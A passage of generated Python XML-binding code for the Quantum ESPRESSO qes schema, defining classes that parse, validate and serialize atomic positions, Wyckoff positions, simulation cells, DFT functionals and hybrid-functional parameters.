        elif nodeName_ == 'wyckoff_positions':
            obj_ = wyckoff_positionsType.factory()
            obj_.build(child_)
            self.wyckoff_positions = obj_
            obj_.original_tagname_ = 'wyckoff_positions'
        elif nodeName_ == 'crystal_positions':
            obj_ = atomic_positionsType.factory()
            obj_.build(child_)
            self.crystal_positions = obj_
            obj_.original_tagname_ = 'crystal_positions'
        elif nodeName_ == 'cell':
            obj_ = cellType.factory()
            obj_.build(child_)
            self.cell = obj_
            obj_.original_tagname_ = 'cell'
# end class atomic_structureType
class atomic_positionsType(GeneratedsSuper):
    """Generated binding for a sequence of ``atom`` child elements."""
    subclass = None
    superclass = None

    def __init__(self, atom=None):
        self.original_tagname_ = None
        self.atom = [] if atom is None else atom

    @staticmethod
    def factory(*args_, **kwargs_):
        """Instantiate this class, honoring any registered subclass override."""
        if CurrentSubclassModule_ is not None:
            override = getSubclassFromModule_(
                CurrentSubclassModule_, atomic_positionsType)
            if override is not None:
                return override(*args_, **kwargs_)
        cls = atomic_positionsType.subclass or atomic_positionsType
        return cls(*args_, **kwargs_)

    # -- accessors for the atom list -------------------------------------
    def get_atom(self):
        return self.atom

    def set_atom(self, atom):
        self.atom = atom

    def add_atom(self, value):
        self.atom.append(value)

    def insert_atom_at(self, index, value):
        self.atom.insert(index, value)

    def replace_atom_at(self, index, value):
        self.atom[index] = value

    def hasContent_(self):
        """Return True when at least one ``atom`` child is present."""
        return bool(self.atom)

    def export(self, outfile, level, namespaceprefix_='qes:', name_='atomic_positionsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element and its ``atom`` children as XML to *outfile*."""
        ns_override = GenerateDSNamespaceDefs_.get('atomic_positionsType')
        if ns_override is not None:
            namespacedef_ = ns_override
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        ns_decl = ' ' + namespacedef_ if namespacedef_ else ''
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, ns_decl))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomic_positionsType')
        if not self.hasContent_():
            # No children: self-closing element.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomic_positionsType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))

    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomic_positionsType'):
        # This type carries no attributes.
        pass

    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomic_positionsType', fromsubclass_=False, pretty_print=True):
        """Export each ``atom`` child element in order."""
        for atom_obj in self.atom:
            atom_obj.export(outfile, level, namespaceprefix_, name_='atom', pretty_print=pretty_print)

    def build(self, node):
        """Populate this instance from a parsed ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child_ in node:
            tag_name = Tag_pattern_.match(child_.tag).groups()[-1]
            self.buildChildren(child_, node, tag_name)
        return self

    def buildAttributes(self, node, attrs, already_processed):
        # This type carries no attributes.
        pass

    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Append a parsed ``atom`` child to ``self.atom``."""
        if nodeName_ == 'atom':
            parsed = atomType.factory()
            parsed.build(child_)
            parsed.original_tagname_ = 'atom'
            self.atom.append(parsed)
# end class atomic_positionsType
class atomType(GeneratedsSuper):
    """Generated XML binding for an ``atom`` element.

    Attributes: ``name`` (string), ``position`` (string), ``index``
    (positive integer).  Text content (the coordinates) lives in
    ``valueOf_``.
    """
    subclass = None
    superclass = None
    def __init__(self, name=None, position=None, index=None, valueOf_=None):
        self.original_tagname_ = None
        self.name = _cast(None, name)
        self.position = _cast(None, position)
        self.index = _cast(int, index)
        self.valueOf_ = valueOf_
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, atomType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if atomType.subclass:
            return atomType.subclass(*args_, **kwargs_)
        else:
            return atomType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors for the attributes and the text content.
    def get_name(self): return self.name
    def set_name(self, name): self.name = name
    def get_position(self): return self.position
    def set_position(self, position): self.position = position
    def get_index(self): return self.index
    def set_index(self, index): self.index = index
    def get_valueOf_(self): return self.valueOf_
    def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
    def hasContent_(self):
        """Return True when text content should be serialized.

        Numeric values (including 0 / 0.0) always count as content; other
        values are judged by truthiness.
        """
        if (
            (1 if type(self.valueOf_) in [int,float] else self.valueOf_)
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='atomType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element (attributes plus text content) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('atomType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='atomType')
        if self.hasContent_():
            outfile.write('>')
            outfile.write(self.convert_unicode(self.valueOf_))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='atomType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No content: emit a self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='atomType'):
        """Emit the ``name``, ``position`` and ``index`` attributes when set."""
        if self.name is not None and 'name' not in already_processed:
            already_processed.add('name')
            outfile.write(' name=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.name), input_name='name')), ))
        if self.position is not None and 'position' not in already_processed:
            already_processed.add('position')
            outfile.write(' position=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.position), input_name='position')), ))
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='atomType', fromsubclass_=False, pretty_print=True):
        # Simple content type: no child elements.
        pass
    def build(self, node):
        """Populate this instance (attributes + text) from *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        self.valueOf_ = get_all_text_(node)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse attributes; ``index`` must be a positive integer."""
        value = find_attr_value_('name', node)
        if value is not None and 'name' not in already_processed:
            already_processed.add('name')
            self.name = value
        value = find_attr_value_('position', node)
        if value is not None and 'position' not in already_processed:
            already_processed.add('position')
            self.position = value
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            try:
                self.index = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
            if self.index <= 0:
                raise_parse_error(node, 'Invalid PositiveInteger')
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Simple content type: nothing to dispatch.
        pass
# end class atomType
class wyckoff_positionsType(GeneratedsSuper):
    """Generated XML binding for the ``wyckoff_positions`` element.

    Holds a list of ``atom`` children plus the ``space_group`` (integer)
    and ``more_options`` (string) attributes.
    """
    subclass = None
    superclass = None
    def __init__(self, space_group=None, more_options=None, atom=None):
        self.original_tagname_ = None
        self.space_group = _cast(int, space_group)
        self.more_options = _cast(None, more_options)
        # Fresh list per instance (avoids the mutable-default pitfall).
        if atom is None:
            self.atom = []
        else:
            self.atom = atom
    def factory(*args_, **kwargs_):
        """Instantiate this class or a registered subclass override."""
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, wyckoff_positionsType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if wyckoff_positionsType.subclass:
            return wyckoff_positionsType.subclass(*args_, **kwargs_)
        else:
            return wyckoff_positionsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Plain accessors for the child list and attributes.
    def get_atom(self): return self.atom
    def set_atom(self, atom): self.atom = atom
    def add_atom(self, value): self.atom.append(value)
    def insert_atom_at(self, index, value): self.atom.insert(index, value)
    def replace_atom_at(self, index, value): self.atom[index] = value
    def get_space_group(self): return self.space_group
    def set_space_group(self, space_group): self.space_group = space_group
    def get_more_options(self): return self.more_options
    def set_more_options(self, more_options): self.more_options = more_options
    def hasContent_(self):
        """Return True when at least one ``atom`` child is present."""
        if (
            self.atom
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='wyckoff_positionsType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this element and its children as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('wyckoff_positionsType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='wyckoff_positionsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='wyckoff_positionsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # No children: emit a self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='wyckoff_positionsType'):
        """Emit the ``space_group`` and ``more_options`` attributes when set."""
        if self.space_group is not None and 'space_group' not in already_processed:
            already_processed.add('space_group')
            outfile.write(' space_group="%s"' % self.gds_format_integer(self.space_group, input_name='space_group'))
        if self.more_options is not None and 'more_options' not in already_processed:
            already_processed.add('more_options')
            outfile.write(' more_options=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.more_options), input_name='more_options')), ))
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='wyckoff_positionsType', fromsubclass_=False, pretty_print=True):
        """Export each ``atom`` child element in order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for atom_ in self.atom:
            atom_.export(outfile, level, namespaceprefix_, name_='atom', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from a parsed ElementTree *node*."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Parse attributes off *node*.

        NOTE(review): unlike ``nat``/``ntyp`` elsewhere, ``space_group``
        has no positivity check here — presumably plain xs:integer in the
        schema; confirm before relying on it being positive.
        """
        value = find_attr_value_('space_group', node)
        if value is not None and 'space_group' not in already_processed:
            already_processed.add('space_group')
            try:
                self.space_group = int(value)
            except ValueError as exp:
                raise_parse_error(node, 'Bad integer attribute: %s' % exp)
        value = find_attr_value_('more_options', node)
        if value is not None and 'more_options' not in already_processed:
            already_processed.add('more_options')
            self.more_options = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch a parsed ``atom`` child into ``self.atom``."""
        if nodeName_ == 'atom':
            obj_ = atomType.factory()
            obj_.build(child_)
            self.atom.append(obj_)
            obj_.original_tagname_ = 'atom'
# end class wyckoff_positionsType
class cellType(GeneratedsSuper):
    """Generated binding for the qes ``cellType`` XML complex type.

    A simulation cell described by its three lattice vectors ``a1``,
    ``a2`` and ``a3``; each is a d3vectorType, i.e. exactly three doubles.
    """
    subclass = None
    superclass = None
    def __init__(self, a1=None, a2=None, a3=None):
        self.original_tagname_ = None
        self.a1 = a1
        self.validate_d3vectorType(self.a1)
        self.a2 = a2
        self.validate_d3vectorType(self.a2)
        self.a3 = a3
        self.validate_d3vectorType(self.a3)
    def factory(*args_, **kwargs_):
        # Prefer a subclass registered by an external module, then the
        # class-level ``subclass`` hook, then the plain class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, cellType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if cellType.subclass:
            return cellType.subclass(*args_, **kwargs_)
        else:
            return cellType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Accessor pairs kept for API compatibility with generated callers.
    def get_a1(self): return self.a1
    def set_a1(self, a1): self.a1 = a1
    def get_a2(self): return self.a2
    def set_a2(self, a2): self.a2 = a2
    def get_a3(self): return self.a3
    def set_a3(self, a3): self.a3 = a3
    def validate_d3vectorType(self, value):
        # Validate type d3vectorType, a restriction on double.
        if value is not None and Validate_simpletypes_:
            # A d3vectorType must contain exactly three doubles.  The value
            # may be a whitespace-separated string (as read from XML text)
            # or a sequence, so count components.  The previous check used
            # len(str(value)) != 3, i.e. the *character* count of the
            # textual form, which warned on every valid 3-vector.
            if isinstance(value, str):
                ncomponents = len(value.split())
            else:
                try:
                    ncomponents = len(value)
                except TypeError:
                    ncomponents = 1  # scalar: cannot be a 3-vector
            if ncomponents != 3:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on d3vectorType' % {"value" : value} )
    def hasContent_(self):
        # Any lattice vector present means there is content to serialize.
        if (
            self.a1 is not None or
            self.a2 is not None or
            self.a3 is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='cellType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this cell to *outfile* as a namespaced XML element."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('cellType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='cellType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='cellType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='cellType'):
        # cellType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='cellType', fromsubclass_=False, pretty_print=True):
        """Write whichever of the a1/a2/a3 child elements are present."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.a1 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:a1>%s</qes:a1>%s' % (self.gds_format_double_list(self.a1, input_name='a1'), eol_))
        if self.a2 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:a2>%s</qes:a2>%s' % (self.gds_format_double_list(self.a2, input_name='a2'), eol_))
        if self.a3 is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:a3>%s</qes:a3>%s' % (self.gds_format_double_list(self.a3, input_name='a3'), eol_))
    def build(self, node):
        """Populate this instance from ElementTree *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one a1/a2/a3 child: validate the text as a double list,
        store it, then re-check the 3-component restriction."""
        if nodeName_ == 'a1':
            a1_ = child_.text
            a1_ = self.gds_validate_double_list(a1_, node, 'a1')
            self.a1 = a1_
            # validate type d3vectorType
            self.validate_d3vectorType(self.a1)
        elif nodeName_ == 'a2':
            a2_ = child_.text
            a2_ = self.gds_validate_double_list(a2_, node, 'a2')
            self.a2 = a2_
            # validate type d3vectorType
            self.validate_d3vectorType(self.a2)
        elif nodeName_ == 'a3':
            a3_ = child_.text
            a3_ = self.gds_validate_double_list(a3_, node, 'a3')
            self.a3 = a3_
            # validate type d3vectorType
            self.validate_d3vectorType(self.a3)
# end class cellType
class dftType(GeneratedsSuper):
    """Generated binding for the qes ``dftType`` XML complex type.

    Describes the exchange-correlation setup: a ``functional`` name plus
    optional ``hybrid``, ``dftU`` and ``vdW`` child elements.
    """
    subclass = None
    superclass = None
    def __init__(self, functional=None, hybrid=None, dftU=None, vdW=None):
        self.original_tagname_ = None
        self.functional = functional
        self.validate_functionalType(self.functional)
        self.hybrid = hybrid
        self.dftU = dftU
        self.vdW = vdW
    def factory(*args_, **kwargs_):
        # Prefer an externally registered subclass, then the class-level
        # ``subclass`` hook, then the plain class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, dftType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if dftType.subclass:
            return dftType.subclass(*args_, **kwargs_)
        else:
            return dftType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Accessor pairs kept for API compatibility with generated callers.
    def get_functional(self): return self.functional
    def set_functional(self, functional): self.functional = functional
    def get_hybrid(self): return self.hybrid
    def set_hybrid(self, hybrid): self.hybrid = hybrid
    def get_dftU(self): return self.dftU
    def set_dftU(self, dftU): self.dftU = dftU
    def get_vdW(self): return self.vdW
    def set_vdW(self, vdW): self.vdW = vdW
    def validate_functionalType(self, value):
        # Validate type functionalType, a restriction on string.
        # Warns (does not raise) when the value is not one of the known
        # functional names.
        if value is not None and Validate_simpletypes_:
            value = str(value)
            enumerations = ['PZ', 'BP', 'PBE', 'REVPBE', 'PBESOL', 'BLYP', 'OLYP', 'PW91', 'WC', 'SOGGA', 'EV93', 'B3LYP', 'GauPBE', 'PBE0', 'HSE', 'VDW-DF', 'VDW-DF-CX', 'VDW-DF-C09', 'VDW-DF-OB86', 'VDW-DF-OBK8', 'VDW-DF2', 'VDW-DF2-C09', 'VDW-DF2-B86R', 'RVV10']
            enumeration_respectee = False
            for enum in enumerations:
                if value == enum:
                    enumeration_respectee = True
                    break
            if not enumeration_respectee:
                # NOTE(review): under Python 3, .encode("utf-8") yields bytes,
                # so the interpolated warning reads b'...' — harmless but ugly.
                warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on functionalType' % {"value" : value.encode("utf-8")} )
    def hasContent_(self):
        # True when any child element is present and needs serializing.
        if (
            self.functional is not None or
            self.hybrid is not None or
            self.dftU is not None or
            self.vdW is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='dftType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element (attributes, then children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('dftType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='dftType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='dftType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='dftType'):
        # dftType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='dftType', fromsubclass_=False, pretty_print=True):
        """Write the functional text element and delegate each complex child."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.functional is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:functional>%s</qes:functional>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.functional), input_name='functional')), eol_))
        if self.hybrid is not None:
            self.hybrid.export(outfile, level, namespaceprefix_, name_='hybrid', pretty_print=pretty_print)
        if self.dftU is not None:
            self.dftU.export(outfile, level, namespaceprefix_, name_='dftU', pretty_print=pretty_print)
        if self.vdW is not None:
            self.vdW.export(outfile, level, namespaceprefix_, name_='vdW', pretty_print=pretty_print)
    def build(self, node):
        """Populate this instance from ElementTree *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Dispatch on the child tag name and build the matching sub-object."""
        if nodeName_ == 'functional':
            functional_ = child_.text
            functional_ = self.gds_validate_string(functional_, node, 'functional')
            self.functional = functional_
            # validate type functionalType
            self.validate_functionalType(self.functional)
        elif nodeName_ == 'hybrid':
            obj_ = hybridType.factory()
            obj_.build(child_)
            self.hybrid = obj_
            obj_.original_tagname_ = 'hybrid'
        elif nodeName_ == 'dftU':
            obj_ = dftUType.factory()
            obj_.build(child_)
            self.dftU = obj_
            obj_.original_tagname_ = 'dftU'
        elif nodeName_ == 'vdW':
            obj_ = vdWType.factory()
            obj_.build(child_)
            self.vdW = obj_
            obj_.original_tagname_ = 'vdW'
# end class dftType
class hybridType(GeneratedsSuper):
    """Generated binding for the qes ``hybridType`` XML complex type.

    Parameters for hybrid-functional calculations: the q-point grid used
    for exact exchange plus scalar knobs (ecutfock, exx_fraction,
    screening_parameter, exxdiv_treatment, x_gamma_extrapolation,
    ecutvcut).
    """
    subclass = None
    superclass = None
    def __init__(self, qpoint_grid=None, ecutfock=None, exx_fraction=None, screening_parameter=None, exxdiv_treatment=None, x_gamma_extrapolation=None, ecutvcut=None):
        self.original_tagname_ = None
        self.qpoint_grid = qpoint_grid
        self.ecutfock = ecutfock
        self.exx_fraction = exx_fraction
        self.screening_parameter = screening_parameter
        self.exxdiv_treatment = exxdiv_treatment
        self.x_gamma_extrapolation = x_gamma_extrapolation
        self.ecutvcut = ecutvcut
    def factory(*args_, **kwargs_):
        # Prefer an externally registered subclass, then the class-level
        # ``subclass`` hook, then the plain class itself.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, hybridType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if hybridType.subclass:
            return hybridType.subclass(*args_, **kwargs_)
        else:
            return hybridType(*args_, **kwargs_)
    factory = staticmethod(factory)
    # Accessor pairs kept for API compatibility with generated callers.
    def get_qpoint_grid(self): return self.qpoint_grid
    def set_qpoint_grid(self, qpoint_grid): self.qpoint_grid = qpoint_grid
    def get_ecutfock(self): return self.ecutfock
    def set_ecutfock(self, ecutfock): self.ecutfock = ecutfock
    def get_exx_fraction(self): return self.exx_fraction
    def set_exx_fraction(self, exx_fraction): self.exx_fraction = exx_fraction
    def get_screening_parameter(self): return self.screening_parameter
    def set_screening_parameter(self, screening_parameter): self.screening_parameter = screening_parameter
    def get_exxdiv_treatment(self): return self.exxdiv_treatment
    def set_exxdiv_treatment(self, exxdiv_treatment): self.exxdiv_treatment = exxdiv_treatment
    def get_x_gamma_extrapolation(self): return self.x_gamma_extrapolation
    def set_x_gamma_extrapolation(self, x_gamma_extrapolation): self.x_gamma_extrapolation = x_gamma_extrapolation
    def get_ecutvcut(self): return self.ecutvcut
    def set_ecutvcut(self, ecutvcut): self.ecutvcut = ecutvcut
    def hasContent_(self):
        # True when any child element is present and needs serializing.
        if (
            self.qpoint_grid is not None or
            self.ecutfock is not None or
            self.exx_fraction is not None or
            self.screening_parameter is not None or
            self.exxdiv_treatment is not None or
            self.x_gamma_extrapolation is not None or
            self.ecutvcut is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='hybridType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Serialize this element (attributes, then children) to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('hybridType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='hybridType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='hybridType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='hybridType'):
        # hybridType carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='hybridType', fromsubclass_=False, pretty_print=True):
        """Write each present child element in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.qpoint_grid is not None:
            self.qpoint_grid.export(outfile, level, namespaceprefix_, name_='qpoint_grid', pretty_print=pretty_print)
        if self.ecutfock is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ecutfock>%s</qes:ecutfock>%s' % (self.gds_format_double(self.ecutfock, input_name='ecutfock'), eol_))
        if self.exx_fraction is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:exx_fraction>%s</qes:exx_fraction>%s' % (self.gds_format_double(self.exx_fraction, input_name='exx_fraction'), eol_))
        if self.screening_parameter is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:screening_parameter>%s</qes:screening_parameter>%s' % (self.gds_format_double(self.screening_parameter, input_name='screening_parameter'), eol_))
        if self.exxdiv_treatment is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:exxdiv_treatment>%s</qes:exxdiv_treatment>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.exxdiv_treatment), input_name='exxdiv_treatment')), eol_))
        if self.x_gamma_extrapolation is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:x_gamma_extrapolation>%s</qes:x_gamma_extrapolation>%s' % (self.gds_format_boolean(self.x_gamma_extrapolation, input_name='x_gamma_extrapolation'), eol_))
        if self.ecutvcut is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ecutvcut>%s</qes:ecutvcut>%s' % (self.gds_format_double(self.ecutvcut, input_name='ecutvcut'), eol_))
    def build(self, node):
        """Populate this instance from ElementTree *node* and return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element, converting text to float/bool/str as the
        schema requires; raises a parse error on malformed values."""
        if nodeName_ == 'qpoint_grid':
            obj_ = qpoint_gridType.factory()
            obj_.build(child_)
            self.qpoint_grid = obj_
            obj_.original_tagname_ = 'qpoint_grid'
        elif nodeName_ == 'ecutfock' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ecutfock')
            self.ecutfock = fval_
        elif nodeName_ == 'exx_fraction' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'exx_fraction')
            self.exx_fraction = fval_
        elif nodeName_ == 'screening_parameter' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'screening_parameter')
            self.screening_parameter = fval_
        elif nodeName_ == 'exxdiv_treatment':
            exxdiv_treatment_ = child_.text
            exxdiv_treatment_ = self.gds_validate_string(exxdiv_treatment_, node, 'exxdiv_treatment')
            self.exxdiv_treatment = exxdiv_treatment_
        elif nodeName_ == 'x_gamma_extrapolation':
            sval_ = child_.text
            # Only the literal XML boolean spellings are accepted.
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
